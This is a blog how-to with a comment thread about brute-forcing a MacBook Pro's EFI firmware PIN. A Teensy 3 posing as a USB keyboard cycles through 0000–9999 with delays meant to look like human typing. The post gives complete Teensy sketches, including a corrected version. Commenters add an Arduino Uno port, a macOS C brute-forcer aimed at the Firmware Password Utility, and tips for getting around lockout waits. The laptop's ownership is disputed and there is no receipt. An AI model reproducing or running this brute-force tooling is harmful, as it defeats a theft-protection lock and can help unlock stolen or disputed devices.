HowTo's

Automated brute force attack against the EFI PIN Lock on a MacBook Pro

I have 10.000 problems but automating a Brute force attack agains a EFI PIN lock is not one of them.

Tengo 10.000 problemas pero automatizar un ataque de fuerza bruta al EFI de una Mac no es uno de ellos.

Updated: The code has already been reviewed and is working, One user I confirm that he implement it with his Teensy 3 and it worked without problems, If you just want to read the code that works without the story behind it, just click here.

Its been said that one must learn from mistakes so I want to share with you mine so that you don't go through the same situation..

A bit of background.

Recently I got my hands on a MacBook Pro that after three weeks of being bought the seller desided that he wanted it back. He expressed this by locking it with a 4 digit PIN and a message that stated “Give me back the laptop and give you back the money”, with out calling or anything..
We both (buyer and I) found it tasteless gesture from the seller especially when he asked to be paid in cash. This is what the screen showed right after turning on the MacBook Pro but without formatting the HDD:

Foto de la pantalla bloqueada por el PIN de OSX

Hands on.

Due to the hostory of this MacBook pro I decided to do a low level format, Mounted the hard drive on another machine and ran `dd if=/dev/random of=/dev/sdd` for about 30 minutes, After that I proceeded to re-assemble the MBP.
To my surprise when I tried to boot from the OSX installation disk to start a clean installation I got a different screen that instead of having 4 numeric fields it had a singe field that accepted as many numeric characteres as you wanted, It appeared that it did not had limits but one thing was clear, it only accepted numeric characters. With a little research I realized that the trick that involved clearing the NVRAM would not work since this MBP had a recent fabrication date and that this hole had been patched. I decided to attempt it any ways and as expected I got nowhere .

Some forums suggested to try every combination manually and that some had taken a couple of weeks to go through all 10 of them, sounds good, right? But what if the PIN is the last attempt, how long will it take? what if I miss a number by mistake?

I have 10.000 problems but automating a Brute force attack agains a EFI PIN lock is not one of them.

Knowing that I am sort of dyslexic and how much I'd rather take a walk on the beach with my family I decide to automate this procedure. The logic is simple, a counter from 0 to 9999 and that the out put gets formatted as 4 digits, not rocket science.
What hardware can I use? What modules from the Linux kernel would I have to load to send data from one computer to antoher via USB as if it were a keyboard? Thats how my quest began but I quiclkly realized that I needed specialized hardware for this.

Most of our computers are unable to tell their USB controller to identify them sefl as a HID device (human interface device) making it impossible to do this via a shell script or using python and a simple cable.

A possible solution could be the Arduino but one needs to build a shield for this to work and the cost of this shield (without including the breadboard or a Protoshield) is approximately $24 without shipping and taxes. The alternative is the Teensy which with S/H and takes is just under $23.
The Teensy 3 ended up being the most cost-effectinve hardware for this task, I do however think that builing the Arduino shield would have been more educational but the lack of free time and a reduced budget made the Teensy a better option.

I placed an orther for the Teensy 3 as suggested by Paul Stoffregen, who told me that the version 3 (the most recent) ran on 3 volts unlike previous versions that used 5 volts and that the industry was moving towards 3 volts devices making 5 volts devices obsolete.

Codding the attack

It took just two days to get it delivered after I bought it and within minutes I had ir running a simplified version of the final code.
This version worked without problems on a plain text editor, It was clear to mee that I was going to have to spend more time on this after my first attempt since despite having working with no issues on a plain text editor it failed doing the actual attack on the MacBook pro, some times it will send just one keystroke, others it would send 2 but seemed to me that it would always failed to send “enter”.
The next day with some rest and a clear mind and not after a 12 hours shift I started to tackle the problem. Some one at Apple invested time and hard work on making it difficult for machines to attack it but at he same time easy for humans so I decided that the best way around this and future issues would be to imitate human behavior and I ended up with this code:
#include <usb_keyboard .h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13;
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
Keyboard.press(pin[1]);
delay(450);
Keyboard.release(pin[1]);
delay(420);
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}

As you can see I avoid sending the four digits together and assign different values ​​to wait between KeyPress and KeyRelease events. I also have different wait periods between each digit. .
After testing for a couple of minutes I note that the MBP had increased the wait time between attempts so I decided to assign a higher value from the beginning.

Since I decided to keep it simple and spiked on installing a screen to keep an eye on which number it was attempting, I decided to make a script which I ran from my Fedora box 18 giving me an estimated on what number it was trying. The script is simple and uses tow values, the first one is the sum of milliseconds I am using for delay() and the second one is same value plus a second, assuming that my reaction time to start the script or is slower than running the rest of the instructions insert some delay. This is the script:
while true
do
clear
echo
date
start=`date +%s -d "Wed Jan 16 17:46:00"`
current=`date +%s`;
echo "Current PIN Between: " | tr '\n' ' '
echo "($current - $start) / 19.782" | bc | tr '\n' ' '
echo " and " | tr '\n' ' '
echo "($current - $start) / 18.782" | bc
sleep 2
done

This is how my monitor looked while I had the script running, I edited the terminalr profile and used a large font so I could see from the other side of my house what was going on.

Foto del shell script que da un estimado de que rango de números se están usando para el ataque

Good news, Bad news.

The best thing about automating this attack was reducing the time I would have to spend doing it manually to just forty height hours to go over the ten thousand combinations, Without skipping or repeating any attempt, far less than the three or more weeks that I would have to spend doing it manually.
Overall I am happy, did not spend more than 30 minutes in total programming in a language that I have not practiced and the Teensy worked flawlessly.

The bad news is that I went twice over all combinations and failed to gain access. Apparently when it is locked and you replace/format the hardrive, the EFI generates a new random password 6 numeric characters or more so in the best case would take me at least 197 continuous days. If I had access to some information of the seller I would have tried different combinations using his personal information such as phone number, birthday, etc.. but with none of it this is not an option.

It is clean that I made a huge mistake when I assumed that formatting the disk would bypass this restrictions, if I had to do it again I would certantly spend more time attacking the OS for digit PIN witht he Teensy. I adviced the buyer to take the seller to a small court or to reach to an apple store to see what annswer he gets although I am sure the answer would not be posirive.

Here is a video of the attack:

A little more extreme alternatives.

In a conversation with an Australian who specializes in pentesting mac EFIs (among other things) I was told that an alternative solution would be to get a fresh MBP, extract its firmware and flash it using a PIC programmer. He also told me that there are ways to get around this attacking the thunderbolt port but these two options have a high risk in bricking the $2.000 laptop.

More information regarding EFI can be found on his blog ho.ax I especially recommend this presentation for those who are curious about his work http://ho.ax/posts/2012/10/ruxcon/.

UPDATE: A bug in the code

Recently this blog post got lots of traffic thanks to hackaday and varios community forums which in consecuence made more people look at my code and pointed at an error on it (do you see the importance of Open Source now?).

in the first couple of lines I am sending pin[1] twice and never sending pin[0]. I just fixed the code and tested it on a plain text document, so far everything seems fine, the new code is:
#include <usb_keyboard.h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}

I will contact the owner of the laptop to see if he can send it back so that I can start the attack again, this is not possible I would like to hear suggestions on how to test it.

- Tuesday 12 March: I have received confirmation that this code is working, As we can see in this posts at MacRumors: http://forums.macrumors.com/showpost.php?p=16981928&postcount=248

Miembro de la comunidad confirma que pudo arrancar desde el DVD usando la Teensy 3 para lo que requirió entrar el PIN correcto.

A member from the MacRumors community forums confirmed that he managed to boot from the installation DVD using the Teensy 3 which he required to guess the correct PIN.

234 Comments

  1. Lightman

    Hi, thanks for the article, appreciate your time and effort.

    So what I understand is if I haven’t formatted my hard disk and im still on 4 digit pin screen, I can try this method and it will hopefully work? plus as you know after entering pin 5 times, it will be disable for 1 min and 5 mins afterwards. but counter can be reset by changing the language, so is there any way to automate this as well(resetting counter)?

    • You are correct if you still have the screen where it clearly ask you for 4 digits, then above sketch with some tweaks can help.

      There are a couple of ways to do this, lets start from the most easy and slow to the more complex but fast:

      1. You modify the script to wait 5 minutes, this should take you less than 4 days to crack it.
      2. If you know the key shortcuts for changing the language this can be codded in to the script right after each attempt reducing the wait time.
      3. If you can not use key shortcuts then you would have to code the mouse movements in to the teensy sketch which I have not done before but I am sure once you play with it some minutes it should be easy.

      You have also asked me privately if some other devices would work, sadly I am not an expert in electronics but from my research you need a device that supports USB HID and for easy programming that is compatible with the Arduino SDK.

  2. Jin

    I have totally no knowledge on programming. Can you please teach me how to add the code for the thing to wait 5 mins after every 5 attempts?

    • JImmy

      did you find the code to program the teensy in order to wait 5minutes every 5 try.

  3. David

    You could contact Apple and ask them to help. I doubt they will, but it’s worth a try.

  4. Eric

    Am I missing something or should Keyboard.press(pin[0]); be here and is not?

  5. Bill

    You sent pin[1] twice, but you didn’t send pin[0]. Is this just a mistake that happened when you made this blog? If this code is what you ran, that would explain why it didn’t work :-)

  6. Ian

    You have a bug in your sketch – you are sending pin[1] twice instead of pin[0], pin[1].

    Also, a LeoStick would be well suited to this problem – it’s a Arduino Leonardo in USB stick form factor, which can act as a HID device out of the box – http://www.freetronics.com/products/leostick

  7. Boy my face is red…. as you guys mentioned, I am sending twice pin[1] instead of sending pin[0]. I ran a quick test on a plain text file to see what happened when I passed 0099 and these are the results:
    ...
    0096
    0097
    0098
    0099
    1100
    1101
    1102
    1103
    1104
    ...

    I will update my post with the correct code in a couple of hours after I test it again and will try to get the buyer to send it back to me again.

  8. anon

    You need random delays in this sketch, something like 1-4 seconds after EACH keypress, and maybe 5-10 seconds after you select enter.

    If you try to imitate human input, then actually make it like human input.
    Human input isn’t in constant miliseconds, but RANDOM SECONDS.

    • I think it is best to get data on what is the actual human behavior, I am sure there are studies out there that know how fast/slow users write on a laptop keyboard and then go from there.

      For example lets say that it turns out that mos people type 1 character each 800ms (just an example), then we could generate random numbers that range from lets say 700ms to 1200ms … with an actual random number generator function.

  9. Lightman

    Hi, i wanted to know if there is a Teensy and LeoStick alternatives, which i can get from uk.
    Because both of above mentioned Boards are not available in Uk :(

    Thanks..

    • No idea, have you try contacting Paul from Teensy?

  10. TJ

    So do you think this code could be modified to work with the 4 digit system easily.

    I dont really know much about coding but I do have an extra teensy 2.0 lying around.

    • I am positive, you might need to modify it so it waits 5 minutes after 3 tries or to do the language change.

  11. mguidry

    To reset the firmware password on newer Macs, you must now follow these steps:

    1. Boot with Option key held to display the boot menu’s firmware password prompt.
    2. Press Control-Option-Command-Shift-S to reveal a 33-digit hash (mixed letters and numbers) that contains an identifier for your specific motherboard and the Atmel chip used for your system. In this hash, the first 17 digits are an identifier for the system’s motherboard, and the last 16 digits are a hash for the password.
    3. Submit the hash to Apple, where someone will put it through a special utility to create a keyfile that is specific for your machine.
    4. Place the file on a special USB boot drive and hold Option to load the boot menu and select this drive.

    The system will read the file and properly reset the firmware password stored in the Atmel chip. d

    • Yes, but he paid cash and I am not sure if he got a receipt for it so it would be difficult to proof to apple the ownership of it

  12. ducky
    • It is more expensive than a Teensy, more than double and that payload is for android I am not sure the delays and behavior would be the same.

  13. Artyom

    hi, if I understand right, you still stands a password and you do not solve this problem?

    • Correct but this was due to a bug in the code. I should be receiving the MacBook again in a couple of weeks so that I can test it again.

      Hopefully it should work

  14. Adam

    Hi, could you please explain how to get your code on a teensy? I am new to this. The teensy software only accept hex files, so how you get your txt file on it? Thx

  15. Jordi

    Hola,

    tengo un Teensy 2, puedo utilizarlo para realizar esta prueba ?

    Un saludo.

    • If Jordi, should function.

      • Jordi

        Thanks :) certainly… And I know I look new (in fact I'm…) how to program or how your program is inserted in the Teensy ? I have no idea.

        greetings and thanks.

        • Start by reading this page: http://www.pjrc.com/teensy/first_use.html

          • Jordi

            Hello,

            worth it, only what is learned and entertaining one :)

            I have finally made a Teensy 3 so I downloaded the Teensyduino, but… where and when I have to enter the program code… I have to do the compilation in C ? I'm sorry but my English is bad apart from almost zero, and I can not understand the steps to configure and use.

            Greetings

          • Jordi

            Hello,

            I finally got a Teensy 3, but I can not program it :(

            I downloaded the software Teensy, and I installed the Arduino 1.0.4, by your program in the Arduino, I give Verify and seems to load properly, and Teensy apacere program in the status bar 56% used y “Press Button to Activate”, teensy pulse button, stops flashing, but not showing “reset”, and if I understand, you have to turn the program Teensy USB connector, but does not ignite at any time.

            I'm using Windows 7 and I have disabled the antivirus… do not know what else to try, can you help me.

            Greetings.

          • The code created as it takes 20 seconds to start, if you post the code, try disconnecting the USB, notepat open, put the cursor in the, connect the usb and wait 1 minute ver.

          • Jordi

            Hello,

            I have managed to introduce the program in Teensy3, Thanks to your instructions !!! And finally !!! the code that is inserted into the lock screen (where there is no character limit and are points when writing) is the same that enters the screen which shows the block 4 Numbers spaces ?

            Greetings.

          • The code on this page is for EFI (on the EFI is what allows you to enter the same field more than 1 numeric digit), The code to display the four fields that allow only one digit field is http://orvtech.com/howto/ataque-fuerza-bruta-pin-icloud/.

          • Jordi

            So if you get the code EFI, will be accessible starting to reinstall ? or always necessary to pin the screen 4 digits ? because with the program and 15 minutes between pin and pin from 6 attempt, this can take several months.. no ?

          • If you really get your mac code continues with the relocation / start depends on how you've chosen to start.

            The lock screen four fields (Lock iCloud) disappears after reinstall.

            In the worst case the script may take a little more than 50 hours.

          • Jordi

            Hello,

            thanks for your time, and I thank all attempts because understand this mess …

            that the script is in the worst case may be delayed 50 hours ?

            how I can make pear boot from USB and reinstalling all OSx ?

            thanks again, and greetings.

  16. Swim Atesa

    I finally managed to port this code to Arduino Uno (which doesn’t support USB keyboard in the first place.

    If anyone wants to know how please let me know so I can post the code here. It is 100% tested.

    • That is awesome Nades! Go a head. Post it

      • Swim Atesa

        FINALLY! Success! That was really short, only two hours of runtime and my code was 0604 :)

        Thanks.
        Here is the Arduino Uno code:

        const int ledPin = 13; // choose the pin for the LED
        int counter = 0;
        int fakecounter = counter;
        int counter0=9;
        int counter1=9;
        int counter2=9;
        int counter3=9;
        uint8_t buf[8] = { 0 };
        void setup() {
        Serial.begin(9600);
        pinMode(ledPin, OUTPUT); // declare LED as output
        delay(10000);
        }
        void loop(){
        if (counter 9999){
        for (int blinkies = 0; blinkies < 8; blinkies++) {
        digitalWrite(ledPin, HIGH);
        delay(20);
        digitalWrite(ledPin, LOW);
        delay(200);
        }
        delay(6000);
        }
        ++counter;
        fakecounter = counter;
        //while(true)
        counter3++;
        if(counter3==10)
        {
        counter3=0;
        }
        if(counter3 ==9)
        {
        addOneToCounter2();
        }
        }
        void addOneToCounter2()
        {
        counter2++;
        if(counter2==10)
        {
        counter2=0;
        }if(counter2 ==9)
        {
        addOneToCounter1();
        }
        }
        void addOneToCounter1()
        {
        counter1++;
        if(counter1==10)
        {
        counter1=0;
        }if(counter1 ==9)
        {
        addOneToCounter0();
        }
        }
        void addOneToCounter0()
        {
        counter0++;
        if(counter0==10)
        {
        counter0=0;
        }
        }
        void releaseKey()
        {
        buf[0] = 0;
        buf[2] = 0;
        Serial.write(buf, 8); // Release key 1234
        }

        • Tim

          Hi Swim
          I tried your code but I cant seem to get it to type in notepad.

          I flashed the UNO so it turned into a USB HID keyboard. I ran some test code and it outputs fine.

          When I verify the code in Arduino it shows a on line:

          if (counter 9999){

          I changed this to:

          if (counter > 9999){

          But it still doesnt seem to work…any help is greatly appreciated!

          Thanks again

          • Can you both post Model and version? I have been reading and apparently newer Arduino Unos can act as HID after you flash them with another firmware. Older models need some hacking (involves soldering a resistor).

          • Tim

            Hi orvtech

            Sorry I dont think I was clear. I have flashed my UNO (R3 V3.0 ATMEGA328) with another firmware using instructions from here: http://mitchtech.net/arduino-usb-hid-keyboard/

            I have verified its acting as a HID by using sample code (also on that website) called “Random Key/Random Delay” and its working fine in notepad on W7.

            The problem comes about when I try to use Swim Atesa’s code. When I verify his code in Arduino IDE I get a error like my earlier post.

            So im thinking maybe he has accidentally missed something out when he posted the code here. I was hoping he could verify the code he posted was the same as he used…

            Thanks again

        • Tim

          Do you think theres any chance we could contact “Nades Atesa” so we can ask him to verify this is the correct code used for his Arduino UNO?

          Thanks

          • Rahman

            Hi guys,

            I have the same board with you Tim but i can’t flash my Arduino. Can you tell me when you do this step by step ?

            Thank you

    • jair

      post it please

  17. walner

    I have a good partner macbook pro 2010 and I have problems with the code as I can get icloud could do me a favor and tell me what steps to take and where to get the so teensy 3 I do not understand much of this

    ….

    is safe to buy the product? http://www.pjrc.com/store

    I am in Colombia and here is not the teensy thank you all for your answers

    • There has to be a teensy necessarily be any device compatible with the Arduino SDK that also support USB HID mode.

      I bought my direct Teensy PJRC smoothly.

  18. walner

    or do you recommend buying this board with Arduino UNO R3 DIP ATmega328P

    edited by admin

    • Here someone posted the code for an Arduino Uno but I have not tried, is a bit more complicated because you have to schedule you unofficial firmware.

      I would go for the Teensy or go to an Apple Store

  19. kc

    //…………… omitted includes ………………………………
    #include <stdio.h>
    #include <CoreFoundation/CoreFoundation.h>
    #include <ApplicationServices/ApplicationServices.h>

    #include <Carbon/Carbon.h>
    #include <IOKit/IOKitLib.h>

  20. kc

    I have another PB. I can’t remember my firmware password.
    But I can boot on mac OS.
    So before going to apple center y have tried to apply your brute force
    method to reset password utility found on install DVD (/Applications/Utilities/
    My naive test don’t works after 1000 first numbers.
    So why your test is only with 1000 first numbers, why not alphanumerics caracters,
    Thereafter my modest code.

    Thanks


    #include <stdio.h>
    #include <CoreFoundation/CoreFoundation.h>
    #include <ApplicationServices/ApplicationServices.h>
    #include <Carbon/Carbon.h>
    #include <OKit/IOKitLib.h>
    int keyCodeFromKeyString(char * keyString);
    CFStringRef createStringForKey(CGKeyCode keyCode);
    CGKeyCode keyCodeForChar(const char c);
    void testString(ProcessSerialNumber psn, char *str);
    //------------------------------------------- main --------------------------------------------
    int main(int argc, char *argv[])
    {
    char buffer[100];
    //............ to have time to put pasword utility to front ..................
    // install DVD /Applications/Utilities/
    usleep(1000000);
    //.............. get process ..................................................
    ProcessSerialNumber psn;
    GetFrontProcess( &psn );
    //............... run brute force .............................................
    for (int i=0; i<=10000; ++i)
    { sprintf(buffer,"%04i",i);
    printf(buffer);
    printf("\n");
    testString(psn, buffer);
    }
    }
    //------------------------------------------- testString --------------------------------------------
    void testString(ProcessSerialNumber psn, char *str)
    { CGKeyCode kcode;
    CGEventRef e;
    CGEventRef k;
    char *pt = str;
    while (pt && *pt)
    { kcode = keyCodeForChar(*pt);
    e = CGEventCreateKeyboardEvent (NULL, kcode, true);
    k = CGEventCreateKeyboardEvent (NULL, kcode, false);
    CGEventPostToPSN (&psn,e);
    usleep(100);
    CGEventPostToPSN (&psn,k);
    CFRelease(e);
    CFRelease(k);
    ++pt;
    }
    kcode = keyCodeForChar(13);
    e = CGEventCreateKeyboardEvent (NULL, kcode, true);
    k = CGEventCreateKeyboardEvent (NULL, kcode, false);
    CGEventPostToPSN (&psn,e);
    usleep(100);
    CGEventPostToPSN (&psn,k);
    CFRelease(e);
    CFRelease(k);
    }
    //------------------------------------------- createStringForKey --------------------------------------------
    // Returns string representation of key, if it is printable.
    // Ownership follows the Create Rule; that is, it is the caller's
    // responsibility to release the returned object.
    CFStringRef createStringForKey(CGKeyCode keyCode)
    {
    TISInputSourceRef currentKeyboard = TISCopyCurrentKeyboardInputSource();
    CFDataRef layoutData =
    TISGetInputSourceProperty(currentKeyboard,
    kTISPropertyUnicodeKeyLayoutData);
    const UCKeyboardLayout *keyboardLayout =
    (const UCKeyboardLayout *)CFDataGetBytePtr(layoutData);
    UInt32 keysDown = 0;
    UniChar chars[4];
    UniCharCount realLength;
    UCKeyTranslate(keyboardLayout,
    keyCode,
    kUCKeyActionDisplay,
    0,
    LMGetKbdType(),
    kUCKeyTranslateNoDeadKeysBit,
    &keysDown,
    sizeof(chars) / sizeof(chars[0]),
    &realLength,
    chars);
    CFRelease(currentKeyboard);
    return CFStringCreateWithCharacters(kCFAllocatorDefault, chars, 1);
    }
    //------------------------------------------- keyCodeForChar --------------------------------------------
    // Returns key code for given character via the above function, or UINT16_MAX
    // on error.
    CGKeyCode keyCodeForChar(const char c)
    {
    static CFMutableDictionaryRef charToCodeDict = NULL;
    CGKeyCode code;
    UniChar character = c;
    CFStringRef charStr = NULL;
    // Generate table of keycodes and characters.
    if (charToCodeDict == NULL) {
    size_t i;
    charToCodeDict = CFDictionaryCreateMutable(kCFAllocatorDefault,
    128,
    &kCFCopyStringDictionaryKeyCallBacks,
    NULL);
    if (charToCodeDict == NULL) return UINT16_MAX;
    // Loop through every keycode (0 - 127) to find its current mapping.
    for (i = 0; i < 128; ++i) {
    CFStringRef string = createStringForKey((CGKeyCode)i);
    if (string != NULL) {
    CFDictionaryAddValue(charToCodeDict, string, (const void *)i);
    CFRelease(string);
    }
    }
    }
    charStr = CFStringCreateWithCharacters(kCFAllocatorDefault, &character, 1);
    // Our values may be NULL (0), so we need to use this function.
    if (!CFDictionaryGetValueIfPresent(charToCodeDict, charStr,
    (const void **)&code)) {
    code = UINT16_MAX;
    }
    CFRelease(charStr);
    return code;
    }

    *edited by admin: code tags break with blank liens

  21. It only uses 5 digit numeric combinations because that is what it accepts. No alphanumeric, special chars, etc..

  22. kc

    It only uses 5 digit numeric combinations because that is what it accepts. No alphanumeric, special chars, etc..

    Ok
    I test with 300000 and no result.

    DVD (/Applications/Utilities/Firmware Password Utility.app don’t works on same password ?…

    thanks,
    (i will go in Apple center … just 600 km from where i leave.)

    • Here the theory, If it was locked form a iOS device it allows you to only enter 4 digits, so it goes from 0000 to 9999 including both numbers.

      Some people say that if it was locked from the OS it allows up to 6 digits (numeric also). I have not used the app that you are talking about, for me, the fastes way is to boot int o EFI by pressing the Option key and attacking it from there.

  23. Jonas

    Dear Orvtech,
    Im in the same situation as you. Got an iMac which got bricked from the deuce-bag seller. Did you manage to get the code working? And are your Macbook working now?
    I have this relative new iMac which is locked too as said. And did the same thing as you, so right now im stuck at the field where there is one long field for a passcode.
    Hopefully i can use your code with a Teensy, but i dont want to buy it before i now that its working.
    Thanks in advance.
    /Jonas

  24. Eric Tseng

    How to load this script in to Teensy3 board? or you sell the board has script pr-eload in there?

    Eric

  25. christian chile

    Friend Overtech
    Leial 100% whole page including feedback so English is also the understanding that these perfectly, analize your code and the comments….
    I have almost everything I need, but I have a question,
    The MBP is a i5, I came to my workshop but the code must be entered in a single cell with unlimited digits, I also is provided a code of 33 characters as usual
    (C0214XXXXXVDTMLAZD923D8XXXXXXX719)
    I see, I asked the code is not the same as trying in this topic.
    Can you help me with information, since it is not far from the subject, what kind of code is what I seek, what options I have, you can do something?? the origin of the mbp not muydiferente to your customer, do not have tickets for the theme of ownership.

    We greatly appreciate your help

    • That screen you see is the EFI Lock, this code should operate.

      • JImmy

        Dear Orvtech,

        I just bought a teensy 3.0 Ver to unlock my MacBook air 2010 system lock problem, could you please send me the code to program my teensy 3.0.
        Por favor.

  26. Nidhal

    Hello Ovrtech,
    Firstly for your time, you probably helped lot of users and will helped student like me for sure !!

    I tried your code for my teensy 3.0 on my MacBook Air 2012 with 10.8.3 and Arduino 10.3 and teensyduino 1.14.
    But when I tried to flash my teensy with your code I have a “compilation erreur” :

    usb_keyboard.c.o: In function `usb_keyboard_press_keycode’: /Users/Macbook/Downloads/Arduino.app/Contents/Resources/Java/hardware/teensy/cores/teensy3/usb_keyboard.c:271: undefined reference to `send_now’
    collect2: error: ld returned 1 exit status

    So my question is, is your code work for Mac user or only for windows ?
    And if it’s work how can I fix this erreur ??

    Thank’s !!

    • Nidhal,

      I tested this code under OSX and Linux, I have no idea if it works for windows since I have over 12 years that I havent touch that operating system.

      Here a couple of tips to help you out:
      - Make sure you are using “tenseeduino” instead of Arduino SDK
      - Make sure you enable keyboard support on the SDK for this code to work. Here is a screenshot now how to do it:
      Screenshot of the Teensyduino SDK menu that allow us to configure it as keyboard, mouse or joystick

  27. Luis

    Tengo un teensy 3 and install all the software and as you say. I do a copy paste to the above TXT and bring it into Sketch (verify / compile) but me an error of ” keyboard_modifier_keys = 0; was not declared in this scope”. What am I doing wrong? Thanks

    • You have enabled keyboard support in the SDK Teensyduino?
      Screenshot of the Teensyduino SDK menu that allow us to configure it as keyboard, mouse or joystick

    • thomasb_it

      I got the same error.
      For the error "keyboard_modifier_keys = 0; was not declared in this scope"

      You have to delete that string from the code and set keyb+mouse+joystick as told by orvtech!

      cheers! start brute force right now!!

  28. djs

    have a mac i bought of craigslist , apprantly was locked , and im stuck at efi mode tried checking keychain files, tried the lock file numbers nothing worked so far, took t to apple, they need the apple id on it, or need the efi codei have the has code.. but if u can tell me where to locate the apple id registedred to the mac i can ask apple to unlock it

  29. Emilio

    Hola about tech , I spend the same , Compre a MacBook Pro , was blocked , send it to Apple and they lowered the snow leopard version , I wanted to upgrade to lion and asks me the damn shtick , I'm not put on computer , as we might talk?

    Right now I have no time to go back to the AppStore and let the laptop back. As he took the damn pin?

    Thank you very much in advance

  30. To the

    Hello,
    I had the same problem ORVTECH after verifying that the blockade had iCloud, format the hard disk.
    I read in the original post could not release the password EFI with teensy, the mistake I?

    I ask to see if it is worth purchasing the teensy and test.

    If it was possible to release the effective?

    Thank you very much!

    • Since the new code can release the lock of EFI. There is another code that allows the iCloud release without reformatting.

      • Walner

        Friend but where is the new code by pressing nesecito compadre who pamper yourself and thank you very much

        • People, this code before you, if you have not found, I recommend that fence to apple store, your appointment and ask them to solve the problem beyond. What the apple store charge for this service they should see it as a tax to the lack of synthesis, analysis, reading and interest. Read the article… I've always said that this generation lacks capacity for synthesis and analysis.. everything has to this pre-digested so they understand.

  31. To the

    So if you can even being it formatted? Excellent! Where is the code posted?
    If it's a good news!

  32. To the

    So if you could release although you've already formatted?
    The efficient code to release this in this post or this posted in another?
    Thank you very much !

  33. pablo

    orvtech 2 questioning :

    • Know of some code that integrates efficiency and then iCloud.
    • When I put to Realize the efi as that was the number that worked? to remove.

    thanks for your answers

    • In this article there is a shell script for that. Read the article.

  34. Steve0

    hi orvtech
    i finally got my teensy today, im on windows 8, i went to pjrc website and followed the instructions, i have flashed the teensy with the icloud code that u gave link to as i am stuck at the “enter system pin code to unlock this mac” page.
    im sure the code went onto the teensy ok because it tells me %57 used, heres what i done…
    open arduino.exe changed board to T3
    changed USB Type to keyboard mouse joystick
    then i pasted the icloud pin unlock code into the jun06 blank sketch, clicked verify OK
    then clicked on Upload..arduino then told me Please press the RESET BUTTON on your Teensy to upload your sketch. Auto-reboot only works if the Teensy is running a previous sketch. The teensy window popped up on my desktop telling me to press button to activate, now the teensy led if off.
    when i take it over to the mac and plug it in the led blinks, ive tryed with and without led blinking and allso tryed plugging the usb in first then turning the mac on and allso turning mac on first then plug teensy in once at pinlock page.
    how can i test this teensy in notepad to make sure this things working ?
    any help or info is much appreciated.

    • Try this.

      On your windows machine, open a notepad, place the cursor inside the notepad (just click in it), then plug the Teensy and wait 2 minutes… you should see it typing.

      If you dont, then you did not uploaded the code to it or you have a typo in the code you uploaded.

  35. Steve0

    once i have the code uploaded it should say %57 used correct ?
    im sure ive done things correct but just cant see why its not even typing in notepad.
    before i flashed the teensy i went and got the needed files..
    serial_install.exe , teensyduino.exe and arduino-1.0.5-windows.exe
    i installed serial_install and extracted arduino-1.0.5-windows then opened teensyduino and installed all the libraries into arduino-1.0.5-windows.
    in teensyduino tools i set board to teensy 3 and USB type: keyboard+mouse+joystick, the serial port was ghosted out as Emulated.(note)when i select serial as usb type its shows com3. but i keep it ghosted out emulated.
    in Tools/Programmer what should it be set as ?
    mine is : AVRISP mkII is this correct ?
    i then copied your code from THIS page as its the ICLOUD code i need flashed, i pasted it into the compiler.. verified the code and uploaded to teensy an here it says %57 used.
    i then unplug teensy and open notepad and click so to get curser and then plug in teensy and wait……. then nothing hapens. o_O ? im %99.9 sure ive done things correctly but its that 0.1 thats stopping things :(
    have i put wrong code on teensy ? could u show me the final working source code pls or send the source to me via email ? thanx for any help

